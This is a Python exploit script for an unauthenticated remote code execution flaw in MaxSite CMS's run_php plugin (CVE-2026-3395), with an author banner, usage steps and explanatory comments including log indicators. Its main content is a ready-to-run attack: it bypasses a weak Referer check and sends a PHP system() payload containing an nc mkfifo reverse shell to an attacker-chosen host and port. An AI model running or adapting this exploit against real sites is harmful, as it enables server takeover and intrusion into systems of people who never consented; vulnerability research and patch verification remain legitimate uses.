#!/usr/bin/env python3
# Exploit Title: MaxSite CMS <= 109.1 unauthenticated RCE via run_php plugin
# CVE: CVE-2026-3395
# Date: 2026-03-01
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://max-3000.com/
# Software Link: https://github.com/maxsite/cms
# Affected: MaxSite CMS <= 109.1 with run_php plugin enabled
# Tested on: MaxSite CMS 109.1
# Category: Webapps
# Platform: PHP
# Exploit Type: Remote Code Execution
# CVSS: 9.8 (Critical)
# CWE: CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code)
# Description: Unauthenticated RCE in preview-ajax.php through eval() in run_php plugin
# Fixed in: MaxSite CMS 109.2 (commit 08937a3c5d672a242d68f53e9fccf8a748820ef3)
# Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port>
#
# Examples:
# python3 exploit.py http://target.com --lhost 192.168.1.100 --lport 4444
#
# Options:
# --lhost Listener IP for reverse shell
# --lport Listener port
#
# Notes:
# Requires run_php plugin to be enabled (common default)
# The endpoint's referrer check is weak: the script passes it by sending a Referer header equal to the target URL
#
# How to Use
# Step 1: Start a listener (e.g. nc -lvnp 4444)
# Step 2: Run the exploit
# Author banner. This print sits at module level, above the imports and outside
# main(), so it is written to stdout as soon as the file is executed or imported.
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║
║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║
║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║
║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║
║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║
║ ║
║ b a n y a m e r _ s e c u r i t y ║
║ ║
║ >>> Silent Hunter • Shadow Presence <<< ║
║ ║
║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ CVE-2026-3395 • MaxSite CMS RCE via run_php ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import requests
import base64
import argparse
import sys
def main():
    """Send the proof-of-concept request for CVE-2026-3395 and report the HTTP result.

    Reads ``target``, ``--lhost`` and ``--lport`` from the command line, then
    issues a single unauthenticated POST to ``<target>/ajax/<b64>``, where
    ``<b64>`` is the base64 encoding of
    ``admin/plugins/editor_markitup/preview-ajax.php``. The form field ``data``
    carries a ``[php]...[/php]`` block and the ``Referer`` header is set to the
    target URL. Nothing is returned; progress and errors are printed.

    What to look for in web-server logs, as visible from the request built
    here: a POST whose path is ``/ajax/`` followed by that base64 string, a
    ``Referer`` equal to the site's own base URL, and a ``data`` field that
    contains ``[php]`` tags. According to the file header, the issue affects
    MaxSite CMS <= 109.1 with the run_php plugin enabled and is fixed in 109.2.
    """
    parser = argparse.ArgumentParser(description="CVE-2026-3395 - MaxSite CMS unauthenticated RCE")
    parser.add_argument("target", help="Target URL (e.g. http://target.com)")
    parser.add_argument("--lhost", required=True, help="Listener IP for reverse shell")
    # No type= is given, so the port stays a string and is not range-checked.
    parser.add_argument("--lport", required=True, help="Listener port")
    args = parser.parse_args()
    # Drop trailing slashes so the URL built below has exactly one "/" before "ajax".
    target = args.target.rstrip("/")
    lhost = args.lhost
    lport = args.lport
    # The plugin file's path travels base64-encoded as the last URL segment.
    b64_path = base64.b64encode(b"admin/plugins/editor_markitup/preview-ajax.php").decode()
    url = f"{target}/ajax/{b64_path}"
    # Shell command string assembled from --lhost/--lport exactly as typed.
    revshell = f"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f"
    # Wrapped in [php] tags; per the file header, the run_php plugin passes such content to eval().
    payload = f"[php]system('{revshell}');[/php]"
    # Referer is simply the target URL; the file header calls the server-side referrer check "weak".
    headers = {"Referer": target}
    data = {"data": payload}
    print(f"[*] Sending payload to: {url}")
    print(f"[*] Reverse shell → {lhost}:{lport}")
    try:
        r = requests.post(url, data=data, headers=headers, timeout=12)
        # HTTP 200 only shows that the server answered; the script never checks
        # whether the submitted code actually ran.
        if r.status_code == 200:
            print("[+] Request sent successfully")
            print("[+] Check your listener for connection")
        else:
            print(f"[-] Unexpected status code: {r.status_code}")
            # Only the first 300 characters of the response body are shown.
            print(f"Response: {r.text[:300]}...")
    # Broad catch: connection errors, timeouts and any other exception are all
    # reported through the same message.
    except Exception as e:
        print(f"[-] Error: {str(e)}")
# Call main() only when the file is run as a script, not when it is imported.
if __name__ == "__main__":
    main()